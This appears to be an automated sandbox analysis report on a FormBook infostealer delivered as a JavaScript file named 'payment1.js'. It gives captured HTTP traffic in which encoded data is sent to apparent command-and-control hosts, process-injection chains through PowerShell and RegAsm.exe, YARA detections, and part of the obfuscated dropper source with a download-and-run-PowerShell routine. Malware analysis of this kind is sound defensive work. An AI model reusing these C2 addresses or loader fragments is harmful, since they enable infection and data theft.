                                                                        17192.168.2.45266313.248.169.48802924C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Feb 18, 2025 08:16:10.872796059 CET571OUTGET /mvfs/?28t=_DlH9FNpJbu&JZfd=OX+XGG1vMjnBpir6rX0/G3mm6BKDnX5s9v0C7sC38KVwA5xuSoQxQAVtGC05vfCZlgARXwgyCJM/mKbUQVyNeO12dcoATF+wDwavyiCFDGb9TNEZS4YCLPo= HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Host: www.weilaishijie.xyz
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Feb 18, 2025 08:16:14.361450911 CET377INHTTP/1.1 200 OK
                                                                        content-type: text/html
                                                                        date: Tue, 18 Feb 2025 07:16:14 GMT
                                                                        content-length: 256
                                                                        connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 32 38 74 3d 5f 44 6c 48 39 46 4e 70 4a 62 75 26 4a 5a 66 64 3d 4f 58 2b 58 47 47 31 76 4d 6a 6e 42 70 69 72 36 72 58 30 2f 47 33 6d 6d 36 42 4b 44 6e 58 35 73 39 76 30 43 37 73 43 33 38 4b 56 77 41 35 78 75 53 6f 51 78 51 41 56 74 47 43 30 35 76 66 43 5a 6c 67 41 52 58 77 67 79 43 4a 4d 2f 6d 4b 62 55 51 56 79 4e 65 4f 31 32 64 63 6f 41 54 46 2b 77 44 77 61 76 79 69 43 46 44 47 62 39 54 4e 45 5a 53 34 59 43 4c 50 6f 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?28t=_DlH9FNpJbu&JZfd=OX+XGG1vMjnBpir6rX0/G3mm6BKDnX5s9v0C7sC38KVwA5xuSoQxQAVtGC05vfCZlgARXwgyCJM/mKbUQVyNeO12dcoATF+wDwavyiCFDGb9TNEZS4YCLPo="}</script></head></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        18192.168.2.45266447.83.1.90802924C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Feb 18, 2025 08:16:19.431338072 CET825OUTPOST /xqy6/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Host: www.dqvcbn.info
                                                                        Origin: http://www.dqvcbn.info
                                                                        Referer: http://www.dqvcbn.info/xqy6/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 201
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Data Raw: 4a 5a 66 64 3d 36 43 31 75 65 4b 39 78 4f 36 34 31 64 61 73 57 4d 45 36 70 6d 4a 45 31 38 50 6d 65 68 32 6a 75 57 57 4b 33 63 6c 4c 62 38 38 38 54 6d 51 30 37 42 43 79 4a 63 6e 43 73 61 38 4a 4a 68 31 74 6a 58 4c 32 62 50 33 39 72 6d 74 78 56 7a 6d 57 6b 4d 67 58 2f 54 6b 67 78 58 38 49 4c 41 6f 43 2b 44 36 34 51 65 2f 79 33 77 33 4a 6c 61 31 4c 70 31 6e 44 65 49 4a 33 4d 6b 78 2b 51 39 4d 73 4c 69 78 53 61 68 76 55 44 65 78 46 56 62 49 34 42 52 67 4f 32 33 6f 63 45 44 48 32 37 6b 4e 6a 54 7a 68 59 36 47 67 6a 56 33 61 47 4e 51 36 71 61 59 4e 63 50 65 30 33 38 6f 38 5a 42 48 4c 6a 43 77 67 3d 3d
                                                                        Data Ascii: JZfd=6C1ueK9xO641dasWME6pmJE18Pmeh2juWWK3clLb888TmQ07BCyJcnCsa8JJh1tjXL2bP39rmtxVzmWkMgX/TkgxX8ILAoC+D64Qe/y3w3Jla1Lp1nDeIJ3Mkx+Q9MsLixSahvUDexFVbI4BRgO23ocEDH27kNjTzhY6GgjV3aGNQ6qaYNcPe038o8ZBHLjCwg==


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        19192.168.2.45266547.83.1.9080
                                                                        TimestampBytes transferredDirectionData
                                                                        Feb 18, 2025 08:16:22.552894115 CET845OUTPOST /xqy6/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Host: www.dqvcbn.info
                                                                        Origin: http://www.dqvcbn.info
                                                                        Referer: http://www.dqvcbn.info/xqy6/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 221
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Data Raw: 4a 5a 66 64 3d 36 43 31 75 65 4b 39 78 4f 36 34 31 53 62 38 57 50 6b 47 70 6e 70 45 79 35 50 6d 65 72 57 6a 69 57 57 47 33 63 67 76 31 39 4b 45 54 6c 30 77 37 41 44 79 4a 50 58 43 73 52 63 49 4e 6c 31 74 30 58 4c 71 70 50 32 52 72 6d 74 31 56 7a 6c 43 6b 4d 52 58 38 42 45 67 7a 61 63 49 4a 64 59 43 2b 44 36 34 51 65 2b 58 59 77 33 52 6c 61 6b 37 70 31 47 44 42 55 5a 33 50 79 68 2b 51 35 4d 73 50 69 78 54 35 68 74 68 59 65 79 39 56 62 4b 67 42 55 68 4f 31 73 59 63 43 48 48 32 77 74 74 44 58 78 30 68 6d 4f 53 75 77 33 4a 2b 71 59 63 6e 41 4a 38 39 59 4d 30 54 50 31 37 51 31 4b 49 65 4c 72 67 34 54 4d 56 47 67 70 55 79 71 56 47 55 71 50 41 42 63 55 34 51 3d
                                                                        Data Ascii: JZfd=6C1ueK9xO641Sb8WPkGpnpEy5PmerWjiWWG3cgv19KETl0w7ADyJPXCsRcINl1t0XLqpP2Rrmt1VzlCkMRX8BEgzacIJdYC+D64Qe+XYw3Rlak7p1GDBUZ3Pyh+Q5MsPixT5hthYey9VbKgBUhO1sYcCHH2wttDXx0hmOSuw3J+qYcnAJ89YM0TP17Q1KIeLrg4TMVGgpUyqVGUqPABcU4Q=


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        20192.168.2.45266647.83.1.9080
                                                                        TimestampBytes transferredDirectionData
                                                                        Feb 18, 2025 08:16:25.102543116 CET10927OUTPOST /xqy6/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Host: www.dqvcbn.info
                                                                        Origin: http://www.dqvcbn.info
                                                                        Referer: http://www.dqvcbn.info/xqy6/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 10301
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Data Raw: 4a 5a 66 64 3d 36 43 31 75 65 4b 39 78 4f 36 34 31 53 62 38 57 50 6b 47 70 6e 70 45 79 35 50 6d 65 72 57 6a 69 57 57 47 33 63 67 76 31 39 4a 6b 54 6c 48 6f 37 41 67 61 4a 65 6e 43 73 53 63 49 4f 6c 31 74 4d 58 4c 79 74 50 32 73 65 6d 76 39 56 7a 46 65 6b 4b 6a 7a 38 4c 45 67 7a 46 4d 49 49 41 6f 43 72 44 36 70 5a 65 2b 48 59 77 33 52 6c 61 6d 7a 70 38 33 44 42 48 70 33 4d 6b 78 2b 6d 39 4d 73 72 69 77 33 48 68 74 6b 74 65 44 64 56 61 71 77 42 57 7a 57 31 78 6f 63 41 4b 6e 33 77 74 74 4f 4a 78 30 56 71 4f 54 62 62 33 4f 65 71 64 37 58 5a 4f 64 4e 31 62 53 37 39 76 4a 77 6c 4f 50 4b 57 75 43 30 75 42 6d 69 59 30 46 2b 59 49 58 4a 66 54 69 45 44 42 59 6a 6b 76 7a 38 42 4e 70 67 68 47 38 32 79 67 65 34 43 68 62 53 34 68 42 6d 73 79 73 38 65 56 53 4b 6a 48 50 65 38 6c 59 4d 36 56 30 30 52 59 4d 61 35 55 34 74 59 31 46 50 4e 6c 5a 49 62 56 32 4f 49 70 73 36 67 74 36 35 72 39 6f 4e 57 44 37 7a 4f 73 36 33 49 73 6e 39 39 48 51 42 44 4a 57 6e 55 66 6b 31 2f 63 4a 6b 72 50 6a 4e 4e 55 79 65 6f 6a 36 66 6e 66 [TRUNCATED]
                                                                        Data Ascii: JZfd=6C1ueK9xO641Sb8WPkGpnpEy5PmerWjiWWG3cgv19JkTlHo7AgaJenCsScIOl1tMXLytP2semv9VzFekKjz8LEgzFMIIAoCrD6pZe+HYw3Rlamzp83DBHp3Mkx+m9Msriw3HhtkteDdVaqwBWzW1xocAKn3wttOJx0VqOTbb3Oeqd7XZOdN1bS79vJwlOPKWuC0uBmiY0F+YIXJfTiEDBYjkvz8BNpghG82yge4ChbS4hBmsys8eVSKjHPe8lYM6V00RYMa5U4tY1FPNlZIbV2OIps6gt65r9oNWD7zOs63Isn99HQBDJWnUfk1/cJkrPjNNUyeoj6fnfhJT5X8sqWuI/tLBYekXnL+DDyfKglpiJDJch6ZP4sZRswgwXrMWZIG8oPrzNijljyI5F/3bjjSV8uFEaICNpI4VJ5YeDRPRGjj3ZfO9aaYVyRA7qFLm48kjfih4xY3f8zzQM/8mG08+gQVbPYTePKI91+edovSlCOuFTw3eF714FMJASQx+5cVXHamL7GV4vgvpmj/N7orjpuPn8DfO+Uz9uI1hlY/nlIsgy63GDBGbvC/nyw4CdHauz3Ayk5duRRW9iIPssQyH+G2DNMlNSt3StxIXjaVYh8JzAfiW622hcOgQStquVos8nU2ugWKwrnQ/AAm5bDKCqaVg1HZyfO9O5FVOzIoWCM1R5gssyRH7PW6FY9oQp4CX8Li0XUHn51EIAcxOARooKD6VZf5rUS4fh9fRB6ToiR/OMBYhKwYWGjH+WWiOidTNOGtqt8SwPfunK7fRch+VoP/8pucPO9/ryrUtG3lTp/Iuzchk1OghZituloBnWdlFqTUaQYsgo5Q4wQlO5ntCuQdHHtxYBZzlLjd1INg+M7VpECkXcSayffTimbqHR36moKoI1UgxBPhgUXUMAxEWUKIjueoevS6n1ei1ImSAbkX3tQ8dGjdPS3cl07gjSzlQmR4ii4uYdnwj9M6/IXF9dQ44B35bzxutyof9nEoj8WH [TRUNCATED]


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        21192.168.2.45266747.83.1.9080
                                                                        TimestampBytes transferredDirectionData
                                                                        Feb 18, 2025 08:16:27.642092943 CET566OUTGET /xqy6/?JZfd=3AdOd/JiBJZfW59JF3bk/JUX+I6ir2eDUVeNMTHa5bokm3l1PR6gBk+gEKdbuXFpEa+iNwYC+tVHkUu9Fw3QKE4rVdEfXJGpPPZQf/r11XdvYWfnyknaUqI=&28t=_DlH9FNpJbu HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Host: www.dqvcbn.info
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Feb 18, 2025 08:16:29.218359947 CET139INHTTP/1.1 567 unknown
                                                                        Server: nginx/1.18.0
                                                                        Date: Tue, 18 Feb 2025 07:16:29 GMT
                                                                        Content-Length: 17
                                                                        Connection: close
                                                                        Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                                        Data Ascii: Request too large


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:02:14:11
                                                                        Start date:18/02/2025
                                                                        Path:C:\Windows\System32\wscript.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\payment1.js"
                                                                        Imagebase:0x7ff619230000
                                                                        File size:170'496 bytes
                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:1
                                                                        Start time:02:14:24
                                                                        Start date:18/02/2025
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:2
                                                                        Start time:02:14:24
                                                                        Start date:18/02/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:3
                                                                        Start time:02:14:26
                                                                        Start date:18/02/2025
                                                                        Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                        Imagebase:0x10000
                                                                        File size:413'184 bytes
                                                                        MD5 hash:FEC299680E47D0901C60D84DD11EFC55
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Avira
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:4
                                                                        Start time:02:14:26
                                                                        Start date:18/02/2025
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                        Imagebase:0x80000
                                                                        File size:65'440 bytes
                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:5
                                                                        Start time:02:14:26
                                                                        Start date:18/02/2025
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                        Imagebase:0x980000
                                                                        File size:65'440 bytes
                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2104088509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2106523345.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2110867358.0000000003840000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:9
                                                                        Start time:02:14:44
                                                                        Start date:18/02/2025
                                                                        Path:C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\tlGuABffGV7.exe"
                                                                        Imagebase:0x3f0000
                                                                        File size:143'872 bytes
                                                                        MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2989939402.0000000003060000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:10
                                                                        Start time:02:14:46
                                                                        Start date:18/02/2025
                                                                        Path:C:\Windows\SysWOW64\MRINFO.EXE
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\SysWOW64\MRINFO.EXE"
                                                                        Imagebase:0x710000
                                                                        File size:14'336 bytes
                                                                        MD5 hash:F664A3E4625D86FC6B389AFF416CF67F
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2989897397.0000000003500000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2989992903.0000000003550000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2987628096.0000000003050000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:11
                                                                        Start time:02:14:59
                                                                        Start date:18/02/2025
                                                                        Path:C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\VhI7TkPM.exe"
                                                                        Imagebase:0x3f0000
                                                                        File size:143'872 bytes
                                                                        MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2992102247.0000000005150000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:12
                                                                        Start time:02:15:13
                                                                        Start date:18/02/2025
                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                        Imagebase:0x7ff6bf500000
                                                                        File size:676'768 bytes
                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Disassembly

                                                                        Code Analysis

                                                                        Call Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        callgraph clusterC0 clusterC2C0 clusterC4C2 clusterC6C0 clusterC8C6 clusterC10C6 clusterC12C6 clusterC22C6 clusterC14C6 clusterC16C6 clusterC18C6 clusterC20C6 clusterC24C6 clusterC26C0 clusterC28C0 clusterC30C0 clusterC32C0 clusterC34C0 clusterC36C0 clusterC38C36 clusterC40C0 clusterC42C40 clusterC44C40 clusterC46C40 clusterC48C40 clusterC50C0 clusterC52C50 clusterC54C0 clusterC56C54 clusterC58C56 clusterC60C58 clusterC62C58 clusterC64C58 clusterC66C58 clusterC68C58 clusterC70C58 clusterC72C58 clusterC74C54 clusterC76C0 clusterC78C76 clusterC80C78 clusterC82C80 clusterC84C80 clusterC86C80 clusterC88C80 clusterC90C80 clusterC92C80 clusterC94C80 clusterC96C78 clusterC98C96 clusterC100C96 clusterC102C96 clusterC104C76 clusterC106C0 clusterC108C106 clusterC110C106 E1C0 entry:C0 F7C6 E1C0->F7C6 F27C26 _0x429836 E1C0->F27C26 F29C28 _0x165511 E1C0->F29C28 F31C30 'CreateObject' E1C0->F31C30 F33C32 _0x36bb1e E1C0->F33C32 F35C34 'CreateObject' E1C0->F35C34 F41C40 DownloadScript E1C0->F41C40 F51C50 LogError E1C0->F51C50 F107C106 RunPowerShellScript E1C0->F107C106 F3C2 _0x3d8f F3C2->F3C2 F5C4 F9C8 _0x47f2ce F7C6->F9C8 F11C10 parseInt F7C6->F11C10 F13C12 _0x5bad84 F7C6->F13C12 F15C14 _0x34690f F7C6->F15C14 F17C16 _0x41ea74 F7C6->F17C16 F19C18 'push' F7C6->F19C18 F21C20 'shift' F7C6->F21C20 F23C22 'push' F7C6->F23C22 F25C24 'shift' F7C6->F25C24 F37C36 _0xe32f F37C36->F3C2 F37C36->F37C36 F39C38 F43C42 _0x5e2485 F41C40->F43C42 F45C44 _0x5b10a7 F41C40->F45C44 F47C46 _0x43684b F41C40->F47C46 F49C48 'Close' F41C40->F49C48 F41C40->F51C50 F53C52 _0x5c2acd F51C50->F53C52 F55C54 _0x2aa5 F55C54->F3C2 F55C54->F55C54 F57C56 F75C74 'zEmbtU' F57C56->F75C74 F59C58 F61C60 'charAt' F59C58->F61C60 F63C62 'fromCharCode' F59C58->F63C62 F65C64 'indexOf' F59C58->F65C64 F67C66 'slice' F59C58->F67C66 F69C68 'toString' F59C58->F69C68 F71C70 'charCodeAt' F59C58->F71C70 F73C72 decodeURIComponent F59C58->F73C72 F77C76 _0x5598 F77C76->F3C2 F77C76->F77C76 F79C78 F105C104 'cSinUy' F79C78->F105C104 F81C80 F83C82 'charAt' F81C80->F83C82 F85C84 'fromCharCode' F81C80->F85C84 F87C86 'indexOf' F81C80->F87C86 F89C88 'slice' F81C80->F89C88 F91C90 'toString' F81C80->F91C90 F93C92 'charCodeAt' F81C80->F93C92 F95C94 decodeURIComponent F81C80->F95C94 F97C96 F99C98 _0x1d860e F97C96->F99C98 F101C100 'charCodeAt' F97C96->F101C100 F103C102 'fromCharCode' F97C96->F103C102 F107C106->F51C50 F109C108 _0xe1c1e0 F107C106->F109C108 F111C110 _0x42f115 F107C106->F111C110

                                                                        Script:

                                                                        Code
                                                                        0
                                                                        var _0x36bb1e = _0x5598, _0x165511 = _0x2aa5, _0x429836 = _0xe32f;
                                                                          1
                                                                          function _0x3d8f() {
                                                                          • _0x3d8f() ➔ MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28
                                                                          2
                                                                          var _0x1bc8c2 = [ 'MSXML2.XMLHTTP', '371190cReolU', 'rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU', 'q3jLyxrLt2jQzwn0', 'bab4W6tdK8oJrG', 'W4iJW43dGGa8W5i7W40iWOVcRq4', 'message', '12642224tnuDGo', 'Quit', 'rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia', '124678FeSFCc', 'WQ7dVXVcVCkpCLJcM8keW6W', 'W4pcUGdcPCojWOdcSJCzWPNdPSkW', 'WRTMW6pdJa', 'otCXnJC0ng50B2XSrq', 'WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa', 'W5eDD8oh', 'W4uIW4NdJfvKWO8CW7yO', '5836fimqHT', 'CreateTextFile', 'PowerShell\x20-NoProfile\x20-ExecutionPolicy\x20RemoteSigned\x20-File\x20', 'rM9SzgvYrxHPC3rZ', 'Download\x20failed\x20with\x20status:\x20', 'nte0mtu4nxrtrejRyG', 'jaK5Emo3iSkUAW', 'W4VdKZ5ZrG', 'WQ0zW5eBW5/cR8oIyHpcSa', 'u3rHDhvZ', 'GET', '9MuWyMs', 'WQhdRvRdTW', 'Run', 'nZDxAenPu0e', 'CreateFolder', 'WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0', 'C:\x5cTemp\x5cdddddd.ps1', 'mZCXmtKWy1jLB2Xv', 'mti2ndiYmJr0BNver28' ];
                                                                            3
                                                                            _0x3d8f =
                                                                              4
                                                                              function () {
                                                                              • _0x3d8f() ➔ MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28
